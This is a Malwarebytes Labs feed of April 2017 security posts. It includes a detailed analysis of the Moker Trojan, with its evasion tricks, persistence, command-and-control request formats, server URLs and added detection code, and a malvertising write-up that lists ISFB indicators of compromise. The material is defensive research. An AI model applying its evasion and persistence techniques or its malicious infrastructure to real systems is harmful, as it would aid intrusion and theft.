Techie Feeds

Locky ransomware is back, but we already protect against it

Malwarebytes - Fri, 04/21/2017 - 23:38

In our Q1 2017 Tactics and Techniques report, we mentioned that the Locky ransomware had mysteriously vanished. Indeed, for a while, it completely disappeared and allowed for Cerber to take the number one spot as the most distributed piece of ransomware (and malware for that matter).

However, the group controlling the Necurs botnet has just opened the spam floodgates again and is pumping out fake documents that deliver the nasty Locky ransomware right before going into the weekend.

PDF to Word Macro

The ransomware is dropped following a distribution method we have been seeing more of recently with Dridex which involves embedding a Word document within a PDF file.

While this may seem like an unnecessary extra step, it actually helps bypass sandboxes. Once the user clicks the OK button, the rogue Word document is displayed:

This last step requires a bit of social engineering to execute a malicious macro that will download the actual Locky ransomware.

Personal files are encrypted with the .osiris extension and the crooks are asking 0.5 Bitcoin ($623 at the time of writing) to recover them.

Protection

The attack relies on users opening up malicious attachments that will appear legitimate. Many studies have shown that users are often the weakest link in an attack chain and criminals know that too well.

Malwarebytes protects against this attack at various layers including macro and ransomware mitigation, and neither of those required any signature update.

The post Locky ransomware is back, but we already protect against it appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Elusive Moker Trojan is back

Malwarebytes - Fri, 04/21/2017 - 18:44

Some time ago we observed a rare, interesting malware dropped from the Rig-v EK. Its code suggested that it was written by professionals. Research has shown that it is a sample of the Moker Trojan, discovered in 2015 (read more here). However, for a long time we could not find a sample with a working CnC in order to do deeper research. Finally, we found such a sample; this article will be a deep dive into its capabilities.

Analyzed samples

Downloaded modules:

8997b9365c697e757f5a4717ec36fb2d – pluginj382dew1i.exe

faf2135dc5311b034d31191694a52bbd – KB1080030.exe

Reference samples (from 2015)

Distribution method

We found the Moker Trojan distributed via exploit kits, in malvertising campaigns as well as dropped from hacked sites. Example: Rig-v EK dropping Moker:

Behavioral analysis

The malware injects itself into the svchost, and then contacts the CnC server.

Network communication

The communication is encrypted. The typical beacon is a request to the address: <gate_name>.php?img=<number>
An example of the sent request:

GET /nnnn04722.php?img=1 HTTP/1.1
User-Agent: Mozilla
Host: bitmixc.ml

The server responds with encrypted content (the bot saves it in a registry key). Then it injects itself into other applications and sends further requests, including data about the infected machine, e.g.:

GET /nnnn04722.php?page=<computername><windows_version>_<disk_id>&s=<number>p=<number>.<number>&err=<number>.<number>

In the below case, the response turned out to be a PE file (an updated version of the bot) obfuscated by XOR with a character ‘c’.

The server responds either by sending some encrypted content or a number:

=<number>
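As an added example (not from the original analysis), the request shape above can be turned into a detection: parse an HTTP request head, match the <gate_name>.php?img=<number> beacon and the follow-up page= request, and require the suspiciously bare User-Agent "Mozilla". The same block undoes the single-byte XOR with 'c' that the downloaded update was observed to use. The requests and the response bytes below are constructed for the demo; the follow-up's parameter names (page, s, p, err) follow the description above, and the fake PE is a stand-in.

```python
# Added example (not part of the original post): match the Moker beacon shape
# in raw HTTP requests and XOR-decode the kind of response the post observed.
# All requests and bytes below are constructed; only the URL shape and the
# bare "Mozilla" User-Agent come from the analysis.

import re
from urllib.parse import urlsplit, parse_qs

# single-segment gate script, e.g. /nnnn04722.php
BEACON_PATH = re.compile(r"^/[A-Za-z0-9_-]+\.php$")


def parse_request(raw):
    """Minimal parser for an HTTP/1.x request head -> (method, target, headers)."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return method, target, headers


def is_moker_beacon(raw):
    """True for the initial beacon (<gate>.php?img=<number>) and for the
    follow-up (<gate>.php?page=<...>&s=...), both sent as GET with the bare
    'Mozilla' User-Agent; anything else is treated as not matching."""
    method, target, headers = parse_request(raw)
    if method != "GET" or headers.get("user-agent") != "Mozilla":
        return False
    parts = urlsplit(target)
    if not BEACON_PATH.match(parts.path):
        return False
    query = parse_qs(parts.query)
    initial = list(query) == ["img"] and query["img"][0].isdigit()
    followup = "page" in query and "s" in query
    return initial or followup


def xor_decode(data, key=b"c"):
    """Undo the single-byte XOR applied to the downloaded update (XOR is
    symmetric, so the same call also encodes)."""
    return bytes(b ^ key[0] for b in data)


def looks_like_pe(data):
    """Cheap sanity check on the decoded blob: MZ magic and room for a DOS header."""
    return data[:2] == b"MZ" and len(data) >= 0x40


# --- constructed samples (hypothetical hostnames/values) ------------------
BEACON = ("GET /nnnn04722.php?img=1 HTTP/1.1\r\n"
          "User-Agent: Mozilla\r\n"
          "Host: bitmixc.ml\r\n")
FOLLOWUP = ("GET /nnnn04722.php?page=WIN7-PC6.1_a1b2c3d4&s=2&p=1.0&err=0.0 HTTP/1.1\r\n"
            "User-Agent: Mozilla\r\n"
            "Host: bitmixc.ml\r\n")
BENIGN = ("GET /index.php?img=1 HTTP/1.1\r\n"
          "User-Agent: Mozilla/5.0 (Windows NT 6.1)\r\n"
          "Host: example.org\r\n")

# fake 64-byte "PE" (MZ magic plus padding) as the server would ship it: XORed with 'c'
FAKE_PE = b"MZ" + b"\x00" * 62
ENCODED_RESPONSE = xor_decode(FAKE_PE)

if __name__ == "__main__":
    for name, req in [("beacon", BEACON), ("follow-up", FOLLOWUP), ("benign", BENIGN)]:
        print(f"{name:10s} -> {'MOKER' if is_moker_beacon(req) else 'ok'}")
    print("decoded response is a PE:", looks_like_pe(xor_decode(ENCODED_RESPONSE)))
```

The bare "Mozilla" User-Agent is the strongest single signal here: real browsers always send a longer product string, so a proxy log filter on that header alone already narrows the haystack before the URL pattern is applied.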

Persistence

Moker achieves persistence by adding a Run key in the registry. This method may look very simple at first. However, the authors of the malware hid the real executable behind a legitimate Microsoft application, rundll32.exe. Thanks to this trick it is much harder to notice: a popular tool for examining persistent applications, Sysinternals' Autoruns, does not show such entries by default, treating entries that launch a Windows binary as harmless. (They can be viewed by clearing the default option "Hide Windows Entries".)
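An added example (not the author's tooling): a small Python check that walks Run-key values and flags the ones that launch rundll32.exe with a DLL outside the Windows directory, which is exactly the shape that Autoruns' default view hides. The entries are constructed for the demo; the value names and DLL paths are hypothetical, and the system root is assumed to be C:\Windows.

```python
# Added example (not part of the original post): flag Run-key entries that use
# rundll32.exe as a proxy to load a DLL from outside the Windows directory.
# The sample entries are constructed; names and paths are hypothetical.

import re

SYSTEM_ROOT = "c:\\windows"  # assumption: default install drive and path
_ENV_ALIASES = {"%systemroot%": SYSTEM_ROOT, "%windir%": SYSTEM_ROOT}


def _first_token(cmd):
    """Split a Windows command line into (program, remainder), honouring quotes."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        if end == -1:
            return cmd[1:], ""
        return cmd[1:end], cmd[end + 1:].strip()
    parts = cmd.split(None, 1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def _normalize(path):
    """Lower-case the path, drop quotes and expand the two common root aliases."""
    p = path.strip().strip('"').lower()
    for alias, real in _ENV_ALIASES.items():
        if p.startswith(alias):
            p = real + p[len(alias):]
    return p


def rundll32_target(cmd):
    """Return the normalized DLL path a rundll32 command line would load,
    or None when the command does not launch rundll32.exe at all."""
    prog, rest = _first_token(cmd)
    if _normalize(prog).split("\\")[-1] != "rundll32.exe":
        return None
    if rest.startswith('"'):
        end = rest.find('"', 1)
        dll = rest[1:end] if end != -1 else rest[1:]
    else:
        # rundll32 syntax is <dll>,<EntryPoint> [args]: the DLL ends at the
        # first comma or whitespace
        dll = re.split(r"[,\s]", rest, maxsplit=1)[0]
    return _normalize(dll)


def is_outside_system_root(dll):
    return not dll.startswith(SYSTEM_ROOT + "\\")


def suspicious_rundll32_entries(entries):
    """entries: iterable of (value_name, command_line) pairs read from a Run key.
    Returns (value_name, dll_path) for every rundll32 proxy whose DLL lives
    outside the Windows directory."""
    hits = []
    for name, cmd in entries:
        dll = rundll32_target(cmd)
        if dll is not None and is_outside_system_root(dll):
            hits.append((name, dll))
    return hits


# Constructed sample of Run-key values (hypothetical names and paths)
SAMPLE_RUN_KEY = [
    ("SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
    ("BluetoothAuthenticationAgent",
     r"rundll32.exe %SystemRoot%\System32\bthprops.cpl,,BluetoothAuthenticationAgent"),
    ("UpdateCheck",
     r'"C:\Windows\System32\rundll32.exe" "C:\Users\victim\AppData\Roaming\upd2.dll",Init'),
    ("srvcore", r"rundll32.exe C:\ProgramData\srvcore\srvcore.dll,Start"),
]

if __name__ == "__main__":
    for name, dll in suspicious_rundll32_entries(SAMPLE_RUN_KEY):
        print(f"[!] Run value {name!r} loads {dll} via rundll32.exe")
```

On a live host the same pairs can be fed from the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (and the HKLM twin) or from Python's winreg module; the heuristic deliberately ignores what the DLL is called and keys only on where it lives, since the file names change between samples while the user-writable drop locations do not.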

The sample of Moker is dropped in the current user’s home directory:

If we take a closer look at the sample, we can see that it has been slightly modified in comparison to the original one – some encrypted information has been removed:

As it turned out after further research (see the part "Inside"), those bytes contain the CnC address, prefixed by a special tag. The information removed from the executable is not lost but stored elsewhere, in one of the registry keys created for storing the malware configuration.

Other keys created by the malware are saved under “..\CLSID\{448D3B34-8D3B-3B34-8D3B-48D3448D3B34}”:

The full dump of the registry entries is available here.

As it turned out, the encrypted CnC address that was removed from the executable is persisted in the registry, inside the key "5":

Compare with the data from inside the original sample:

Another key, “6”, stores a PE file (the executable dumped from the registry is available here: 91f754c3fc475aed93e80575bb503c73).

The key “7” stores the data that was downloaded from the CnC after the initial beacon:

Compare with the content of the server response:

The key “10” contains the name of the downloaded module:

The new module is stored in ProgramData:

Its persistence is added also with the help of a Run key (in a similar way as the previously described case):

Inside

Moker consists of two main modules: Stage 1, a downloader, and Stage 2, a DLL containing the core malicious features. The downloader injects itself, along with the unpacked shellcode, into svchost.exe. The screenshot below shows an example of the infected memory pages inside svchost.exe:

The injected shellcode is responsible for sending the initial beacon to the CnC. Then, if the CnC is active, the main DLL is downloaded and injected into other processes. During the tests, all 32-bit applications running at Medium integrity level were infected by the Moker DLL.

Stage 1

Let’s dive into the code, starting from the dropper, that is Stage 1. This is the binary used for initiating the full infection process, originally delivered by exploit kits. Every sample comes packed by some crypter (crypters differ between samples, so we will not describe this layer here).

After defeating the crypter's stub, we get another PE file, with a layout typical for Moker. The .text section, which is normally the first section of a PE, comes second in Moker's case:

The .data section is very small in the raw file but expands in the virtual image, so we can suspect that something more is unpacked there:

Obfuscated execution flow

The internal structure of this module is very interesting. It has self-modifying code with execution driven by VEH (Vectored Exception Handlers). Execution starts from installing the handler:

IN instructions are used in various places in the code. Their role is to break the continuity of execution by triggering an exception (IN is a privileged instruction, so executing it from user mode raises one). Execution is then redirected to the previously installed handler. Depending on the variant of the instruction that triggered the exception, the thread context is changed in one of a few ways:

Context patching is used to obfuscate the execution flow. Thanks to this trick, static analysis of the code is almost impossible: everything changes on the fly.

The JMP EAX (first case in the exception handler) is used to dispatch API calls. It is triggered by IN AL, <BYTE> (see the example below):

That’s why, if we trace the API calls made by the application, we can notice that most of them are made from the same address in the code – only the target address is changing.

Not only the execution flow but also the code itself is dynamically modified. We can find the application calling VirtualAlloc very often:

Some pieces of the encrypted code are copied from the main executable into this dynamically allocated memory:

Then, they are decrypted by a dedicated function:

The revealed code is almost ready, except for the addresses of calls, which need to be filled in. You can see in the following fragment that, temporarily, the CALL points to its own address:

This is fixed in another step – the decoding function returns into another code fragment, that modifies the addresses:

Until the new piece of code is fully revealed and ready to be called (see the fixed CALL target):

When the modifying function returns, execution falls into the line that performs a jump into the new code:

The revealed code makes another layer – again allocating, decrypting and calling code.

The code chunks that provide some real functionality are always deployed via this type of proxy – that makes execution flow more complicated.

Functionality

The dropper starts execution with defensive checks, ensuring that it is not running in a controlled environment. The following registry keys are searched:

"HKEY_LOCAL_MACHINE\\HARDWARE\\ACPI\\DSDT\\VBOX__" (VirtualBox)
"HKEY_CURRENT_USER\\Software\\Trusteer\\Rapport" (Trusteer Rapport)
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" -> SysAnalyzer

If all the checks pass, the application reads its own file from disk and searches it for some typical markers. An example of the search:

The important thing is that those markers are present in the outermost layer, the original PE file (not the unpacked one). Thanks to this, knowing them made it possible to create a very simple YARA rule to identify Moker:

rule MokerTrojan
{
    strings:
        $key = { 3D FF 24 8B 92 C1 D6 9D }
    condition:
        uint16(0) == 0x5A4D and all of them   // MZ header, then the marker bytes
}

The markers serve as tags: the encrypted CnC address is stored right after them.

Another feature typical of Moker is a mutex in the following format:

"Global\\a0bp-<Machine_ID>"

The mutex prevents the application from being run more than once.

After the environment checks are passed, Moker unpacks the shellcode, that has capabilities of a downloader, and injects it (along with the initial PE file) into svchost.

Stage 2

If the main DLL was successfully downloaded by the Stage 1, it is being further injected in the applications. Example – Moker DLL injected into jusched (Java Update Scheduler):

This module is responsible for all the malicious actions performed by the malware – also, it actively communicates with its CnC. Below you can see a sample POST request sent from inside the injected DLL:

If we try to dump the injected DLL, we can see that its import table has been destroyed: all the names of the DLLs and imported functions are erased. However, using a dedicated tool I was able to recover it (see more here).

The DLL provides various features typical for a RAT (they have not changed since the latest analysis in 2015, provided here).

The code of the core DLL is written in a decent way, suggesting the professionalism of the authors. However, in contrast to the dropper, the obfuscation used here is rather simple. Most of the strings and API calls are not obfuscated, or are obfuscated in a trivial way.

Looking inside the code, we can see references to the registry keys observed during the behavioral analysis, e.g.:

The DLL communicates not only with the CnC, but also with its other injected modules, using local sockets and named pipes. An example below, starting a local socket for listening:

The commands read from the pipe are parsed and executed:

Based on the command ID, the malware can be requested over the pipe to execute a command or to create and save a screenshot:

Among the interesting features of this part, it also provides access to its functionality via a simple GUI. It may be used for local tests, or in case the attackers prefer to access the victim machine via Remote Desktop.

CnC servers

List of the found CnC servers (one address per sample):

http://bitmixc.ml/nnnn04722.php
http://bitmixc.ml/msnwiwoq25.php
http://matthi.tk/abb6a388.php
http://sally33.cf/23mmmdw3.php
http://siri5.ml/www9.php

Conclusion

Moker is a rare malware, but written by very skilled authors. The compilation timestamp of the core module is 2015-05-03 00:40:11. This suggests that the same samples have been in circulation since the moment of its appearance, only repacked by different packers. This leads us to the conclusion that the tool was produced and sold on the black market in 2015 and was possibly abandoned by the original developers afterwards.

Appendix

http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network – Ensilo on Moker (from 2015)

https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/ – part 1

https://breakingmalware.com/malware/moker-part-2-capabilities/ – part 2

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.


The post Elusive Moker Trojan is back appeared first on Malwarebytes Labs.


Binary Options malvertising campaign drops ISFB banking Trojan

Malwarebytes - Thu, 04/20/2017 - 15:00

We have been witnessing a series of malvertising attacks that keep a low profile with decoy websites and strong IP address filtering. We are calling it the ‘Binary Options’ campaign because the threat actor is using the front of a trading company to hide the real nature of his business.

There have been similar uses of fake façades as a gateway to exploit kits. For instance, Magnitude EK is known to use gates that have to do with Bitcoin, investment websites and such, as detailed in this Proofpoint blog entry.

In this particular case, the threat actor stole the web template from “Capital World Option“, a company that provides a platform for trading binary options. Participants must predict whether the price of an asset will rise or fall within a given time frame, which defines whether or not they will make money. Binary options have earned a bad reputation though and some countries have even banned them.

Fraudulent infrastructure

Below is a screenshot of the legitimate website that is being impersonated. There are some differences between the real one and the fakes: the former uses SSL and was registered a while ago. Also, some of the website functionality does not work properly on the decoy versions.

Legitimate site:

Decoy site that ripped all the branding:

Those fake sites are only meant to be viewed if you are not a target of this particular malware campaign. In other words, if you load the infection chain from the malvertising call and see the site, you will not be infected. Infections happen when the fraudulent server forwards victims directly to a second gate, without showing them any of the site’s content.

The same threat actor has registered many different lookalike domains using a similar naming convention. The recent creation dates for these decoy sites are a hint that they are not likely to be legitimate:

Domain Name: CAPITALWORLDOPTION.COM
Creation Date: 2017-04-04T09:15:14Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrant Email: detes55@mail.ru

Malvertising chain

The attack starts off with an ad call from one of a few ad networks (Popads, PlugRush were detected in our telemetry) and redirects users to the decoy website where a quick IP check is performed.

Only legitimate users will be redirected to the second stage server, which also performs its own check. Once again, unwanted traffic will be dumped (and a message – perhaps from the threat actor? – “No time for rent” passed in the URL):

Otherwise, users that have made it past those two gates will be presented with the RIG exploit kit.

Banking Trojan

The final payload consistently distributed via this campaign (across different geolocations) appears to be an ISFB variant (AKA Dreambot, Gozi, Ursnif), based off an old but resilient banking Trojan. Some of its features include web injects for the victims’ browsers, screenshotting, video recording, transparent redirections, etc.

The artifacts left on the system were very similar to those described in a Proofpoint blog about Dreambot and the samples we collected also download a Tor client. The registry entry for the Tor client can be seen below:

Modular structure

The sample retrieves several modules once it has taken hold of a victim machine; below is an overview:

Original Dropper
  -> loader.dll injected into svchost.exe
     -> client.dll and tordll.dll downloaded and injected into explorer.exe and into browsers

The main executable injects a file (loader.dll) into svchost.exe in order to download the other modules, which are encrypted in transit (tor.dll and client.dll), both available in 32-bit and 64-bit builds:

We can notice the “ISFB” signature within the malware code:

This piece of malware has some anti-VM features, for example, it checks on the mouse cursor:

Modules are injected into explorer.exe and try to establish a connection to an .onion address. Browsers are also injected, via client.dll as depicted below with Mozilla Firefox:

There are scores of hosts contacted post infection, as well as Tor connections that trigger many Emerging Threats (ET) rules from the "ET TOR Known Tor Relay/Router (Not Exit) Node Traffic" group.

Conclusion

This particular campaign focused on a very specific malvertising chain leading to the RIG exploit kit and – as far as we could tell – dropping the same payload each time, no matter the geolocation of the victim.

Banking Trojans have been a little bit forgotten about these days as they are overshadowed by ransomware. However, they still represent a significant threat and actually do operate safely in the shadows, manipulating banking portals to perform wire transfers unbeknownst to their victims or even the banks they are targeting.

Malwarebytes users are protected against this threat at various levels: domain and IP blocks, exploit mitigation for RIG EK, and detection of the malware payloads.

Related material

IOCs

‘Binary Options’ domains:

all-binarys-option.com
all-binarys-options.com
binaryoptionleader.com
binaryoptionleaders.com
binarysfinanceoptions.com
binarysoption.com
binarys-option.com
binarysoptionleader.com
binarysoptionleaders.com
binarysoptions.com
binarys-options.com
binarysoptionsfinance.com
binarysoptionsleader.com
binarysoptionsleaders.com
capitalworldoption.com
financebinarysoptions.com
financeoptionbinarys.com
financeoptionsbinarys.com
financesoptionbinary.com
financesoptionbinarys.com
financesoptionsbinary.com
financesoptionsbinarys.com
opteckoption.com

‘Binary options’ IP addresses:

217.23.1.65
217.23.1.66
217.23.1.67
217.23.1.104
217.23.1.130
217.23.1.187
217.23.1.200

Redirects:

basefont.ul-8.moskvi.ru/user5.php
p.figcaption-7.nfl.si/user5.php
command.bdo-3.mirifictour.ro/user5.php
menu.command-2.moskvi.ru/user5.php
code.a-10.moskvi.ru/user5.php
header.h5-2.mirifictour.ro/user5.php
input.noframes-8.narovlya.ru/user5.php
col.output-9.nfl.si/user5.php
meter.em-8.narovlya.ru/user5.php
applet.x-3.nomundodapaula.com.br/user5.php

Payloads from different geos (ISFB):

f2f8843673000b082ad08bd555c8cd023918a3c11af9d74e9fa98f3b1304b6be
f12bc471f040146318a6fbd2879a95d947d494bd0b869dc95c01cfc22af0ab13
61dd7aa2ca44371b7c8cd4dc9e5f3bd05a8c6213d8e6357dfdb9034b1c0fd590
aed39345668d24dced4b83c36321e98ec9f09af3044b94ceecf01662de0189ab

Post infection traffic:

158.69.176.173/images/zln7qsefZ961EfLVkD3/0FmzZhicPZalFMUtdp9E0C/JxRcPKmDA9QAA/dNCE_2Bz/nFe1Bp_2FQNkn0aOHQCqpjG/33nc7lV8N1/jqOZO3jD875TzqQe2/H4W4lqjSRyxC/y8DoNHjxcTr/G95nFCsQ3Okctfp6/BiJ/.avi
158.69.176.173/images/KziuBbVMi/s2WSfAlAnamELXfRux7g/hq2LcDlwVjaxz0wE5od/9arE_2F5SMgQT998TrddNM/4d_2BLLUe0pfm/epm_2Fgg/3RjjJAXl_2BNDeRmGWmDepV/uMhwCLFDJQ/gkVfwnDYZJfM9VuaZ/J0K10GnIYbAf/EFUtmfqTfj0/I2i5fuZ6/1Rys9uq/.avi
158.69.176.173/images/xeF9Qj1PPNbvhLGetscM/N_2FnVKgMXfiY05zWnD/WL5p5iqJTPu43MoqB_2FZ8/y_2BMpwWHCygC/iIfdEdE4/zCDZ_2FYukajKGJu2XwR_2F/5gPQp0gmRe/6Nms6WfWADsw0I92V/k_2FmprVONWQ/1YP45RKaYhQ/ZOFhK6V/.avi
158.69.176.173/images/smmqGoxf/caltlwZ4eJEFQRiF13_2FDr/jb3Lhoj5l3/3C3I8HbwUcIkIKNfL/GIUnsu0NJ4bJ/ZXPEqKW98uh/zBpYxDhxeVIPy6/cYD1wzpUZwSX4VlTDrU_2/Be4T8_2BuFE_2BWW/MED1GtDjNb13kH2/L77gQOYerQ/4/.avi
158.69.176.173/tor/t64.dll
ip-addr.es/
aeeeeeeeeeeeeeeeeeeeeeeeeeeeva.onion/images/skmTPhNwp9NVU/_2F4G_2B/uO_2FVNwGzKHjF6XXm_2FwR/ozV3WtHKFN/qHCZk_2F3zfY5Tun4/1_2BY1OBwXA5/h78wUMDgWOn/Oa3902QJKJepaG/gUyn6OwepJp_2FOUDt5DR/ghzi_2F0if2w_2F_/2FdLkzlJyrJBEYQ/JpqpaM_2Fe9ZGGJ0sH/0PPW00gpm/fw759RTtukH4CWzHzdgY/YeqpElX.jpeg
aeeeeeeeeeeeeeeeeeeeeeeeeeeeva.onion/images/mUKxVkxTd4/jVGmdXz5wgukSnoqn/dHI0tQ0GMoHy/t33eKJEj_2B/eJhlUIVkjtD0_2/FQQ_2BYinpCl5HhsfJrU4/yvNBC3qaWv_2FVe4/E_2Fx7bI21jWxgd/zVb0J5JvNu2Lw16DFS/54MHtYxkR/SAahGsIeNYj7btD7lEtU/WXJ_2FZExsnS_2FrMYl/_2FpoHgPSdiun20G8AgOLX/G1pu.gif

The post Binary Options malvertising campaign drops ISFB banking Trojan appeared first on Malwarebytes Labs.


ShadowBrokers releases more stolen information

Malwarebytes - Fri, 04/14/2017 - 18:03

ShadowBrokers shocked the security world again today by releasing another cache of exploits, files, and operational documents purportedly stolen from Equation Group last summer. As you may recall from our earlier publications, Equation Group is reportedly a clandestine hacking group that has been linked with NSA hacking tools.

The dump of information released today contains a number of exploits and Windows binary files that were not seen in the previous collection. While the ‘Auction’ file may have contained obsolete exploits and information, this new release appears to contain much more recent and current data, including 0-day exploits. While we haven’t had time to fully review the information, Twitter user HackerFantastic has already reported a successful 0-day exploit against Windows Server 2008.

HackerFantastic showing exploit against Windows 2008


NSA-FTS327 USA USA strings located

One bit of information we have already uncovered is the ‘Author’ tags located on some of the document files. These tags contain a reference to the string NSA-FTS327. This string appears in a number of NSA organizational documents and appears to be related to the Requirements and Targeting office. The Snowden Surveillance Archive identifies the Requirements and Targeting office designation as FTS327, and provides a document authored by NSA’s Texas TAO, Requirements and Targeting office suggesting that computer network exploitation was used to exploit a weakness in Mexican President Felipe Calderon’s public email. The program used the code name ‘FlatLiquid’. While no mention of that particular code name has been found in this dump, if the Author string found on the documents is accurate, then that would suggest there may be validity in the claims that these are NSA tools.

Screenshot of Snowden Surveillance Archive showing the FTS327 designation.

There is a lot of information to sift through in this dump before researchers have an idea of the scope of the release, and it may take several days before a full analysis of the information is completed. If there are active 0-days, we will see software manufacturers scramble to release timely patches to thwart the almost certain use of this code by malicious actors in the ‘residential’ business of malware infection, as we saw with Microsoft earlier this week in regards to the Office 0-day that was circulating via spam.

We are currently analyzing the roughly 1000 Windows binaries that were included and, if necessary, will be pushing any needed updates before I even finish proofing this blog entry.

The post ShadowBrokers releases more stolen information appeared first on Malwarebytes Labs.


Amazon third party sellers: A new threat

Malwarebytes - Fri, 04/14/2017 - 15:00

On Monday, the Wall Street Journal reported a wave of hijacked Amazon seller accounts that proceeded to fleece buyers for large sums of money. As reported here, attackers would use credentials harvested from other breaches to take over the account, then either simply redirect funds to their own deposit account or create lots of fake “sales” to collect money from buyers, but never deliver goods. Pretty good scam, right? So how do we defend against it?

First, we’ve talked about credential dumps before and why they’re a security risk. In brief, a breach on a third party site that isn’t all that important to you can yield credentials that can be reused on sites that are much more important. (Please do not reuse passwords.) While you can’t control how a third party chooses to protect your password, you can implement control measures on your end like Two Factor Authentication. While Amazon doesn’t appear to have documentation on how to do this for a seller account, their support forum makes reference to its recent release as a feature here. The thread also has some great advice for sellers who suspect their account has been breached:

That’s all well and good for sellers, but how do you protect yourself from a bogus third party seller? First, do not rely on feedback alone. Sellers can easily purchase bots to generate positive feedback for themselves in bulk. Further, Amazon seller fraud generally runs on a cycle of several weeks. The fake seller will collect orders within that timeframe, then at the threshold where a defrauded buyer is able to tell Amazon “Hey I never received the item,” they’ll take their money and close the account. If they’re able to do this before attracting significant scrutiny, a new account can be opened and the process can start again. A simple way to not get caught by this sort of scam is:

Don’t use third party sellers

Simple, but not easy. Let’s say you’re a vintage electronics collector and you want to buy this sweet click wheel iPod.

It says Apple right there in the header, so it must be a refurbished product, right? But, if you look further down you’ll see a very optimistic sales price and

Fulfilled by Amazon. Which means…

So while Amazon will ship that snazzy iPod to you, they can’t tell you how reliable the seller is, if the iPod actually is an iPod, or something closer to a P-P-P-Powerbook. What you really want is “Ships from and Sold By Amazon,” as seen here:

Buying only “Ships from and sold by,” can be harder than it looks. Sales analysis here shows that third party sellers make up a significant portion of Amazon’s profits and are projected to increase sharply over the near term. According to CNBC, roughly 40% of Amazon’s unit sales come from third parties and the number can be higher for certain types of products. While it is increasingly frustrating to avoid bogus sellers, the company does provide extensive support after the fact and will guarantee that purchases are delivered and are as advertised.

Amazon third party sellers have consistently had issues with fraud and counterfeit goods. Now we can add a new threat to the pile of attacks against sellers themselves. Keep yourself safe by using a quality password with two-factor authentication enabled and try to stick with the seller you know, rather than someone offering a price that might be a little too good.

The post Amazon third party sellers: A new threat appeared first on Malwarebytes Labs.


Report: Cybercrime climate shifts dramatically in first quarter

Malwarebytes - Thu, 04/13/2017 - 09:00

The first quarter of 2017 brought with it some significant changes to the threat landscape and we aren’t talking about heavy ransomware distribution either. Threats which were previously believed to be serious contenders this year have nearly vanished entirely, while new threats and infection techniques have forced the security community to reconsider collection and analysis efforts.

In our second Cybercrime Tactics & Techniques report (read the first one here), we are going to take a deep look at what threats got our attention the most during the first three months of the year, what we expect to happen moving through the next quarter and a behind the scenes interview with one of our Malwarebytes Labs analysts. Here is a sneak peek at what we are going to cover:

  • Cerber ransomware took over as the top dog as far as distribution and market share.
  • Locky ransomware has dropped off the map, likely due to a deliberate change by the controllers of the Necurs spam botnet; however, with no new Locky versions developed since before the beginning of the year, the fate of its creators is unknown.
  • The Mac threat landscape saw a surge of new malware and backdoors in Q1 2017, including a new Mac ransomware (FindZip).
  • On the Android side, two notable malware families have been causing a lot of trouble. HiddenAds.lck, which locks the device from being able to remove the app, therefore allowing for more advertisement revenue for the creators, and Jisut, a mobile ransomware family that has been spreading like wildfire.
  • In the exploit kit world, RIG continues to have the greatest market share of the few exploit kits that are still active and we expect this to continue. RIG exploit kit remains on top mainly due to its lack of competition rather than its technical sophistication.
  • Malicious spam campaigns have also started utilizing password protected zipped files and protected Office documents to evade auto analysis sandboxes utilized by security researchers.
  • In social media scams, users were bombarded with links to WWE nude photo dumps that lead to gift card survey scams.
  • Tech support scammers, finding difficulty working with North American payment processors, have begun accepting alternate forms of payment, such as Apple gift cards and bitcoin.

Looking ahead to the second quarter of the year:

  • We expect to see continued heavy distribution of Cerber through Q2 2017 due to new developments made to the malware design and its continued use of the ransomware as a service (RaaS) model.
  • As far as Cerber losing its crown, it is unlikely within the next quarter that any competitor will rise in market share enough to dethrone Cerber, barring something happening to the developers of Cerber and their ability to develop and distribute the ransomware.
  • The continued heavy development of Mac malware throughout Q2 is highly likely.
  • The Android ransomware Jisut is expected to continue its trend of high distribution and spread. We predict the same for HiddenAds.lck.
  • Distribution mechanisms are likely going to develop new features and functionality, be it through social engineering tactics utilized by exploit kits and malicious spam or from the discovery of new exploits, potentially revitalizing the exploit kit market.
  • Finally, in the world of scams, we expect to see an uptick of ‘exit scams’ and tech support scammers utilizing social media advertising to scam each other. At the same time, we predict increased collaboration between PUPs and TSS through tech support scammer advertisements being pushed alongside potentially unwanted programs.
Download full report here


Thanks for reading and safe surfing!

The post Report: Cybercrime climate shifts dramatically in first quarter appeared first on Malwarebytes Labs.


What is a Zero-Day?

Malwarebytes - Wed, 04/12/2017 - 15:00

You have probably heard the term zero-day or zero-hour malware, but what exactly does it mean?

It’s simple: it just means the malware is using a software vulnerability for which there is currently no available defense or fix. The vulnerability allows the malware to perform actions on your system that should not be permitted, such as running arbitrary code. Such malicious actions can impact the confidentiality, integrity, or availability of your system.

If a vulnerability is known already (i.e. not a zero-day), then chances are the software vendor has patched it, and/or security software vendors have added defenses against it. So you can protect yourself against known vulnerabilities simply by keeping your software, including your anti-malware defense, up to date. But these precautions will not protect you against zero-days.

You can think of the search for new vulnerabilities as a race. When security researchers and other good guys find one, they warn the software vendor so that the vulnerability can be patched. The best practice, called “responsible disclosure”, is to do this privately at first, so the bad guys don’t get a heads-up. Once enough time has passed for the vulnerability to be patched, the finding is made public. At that point it may be assigned a CVE identifier by the MITRE Corporation so that any interested party can refer to the vulnerability by a standard name.

Unfortunately, the bad guys are also in this race. They look for vulnerabilities in order to accomplish their ends, which generally involve ripping you off in some way. They try to find undisclosed vulnerabilities and create malware that takes advantage of them.

So are we defenseless against zero-day attacks? Happily, the answer is no. Anti-Exploit software like Malwarebytes Anti-Exploit can monitor your system for the sorts of actions associated with zero-day exploits and shut them down before they harm your system. If you’d like to learn more about the technical details, you may read about them in this blog post about how Malwarebytes Anti-Exploit works.

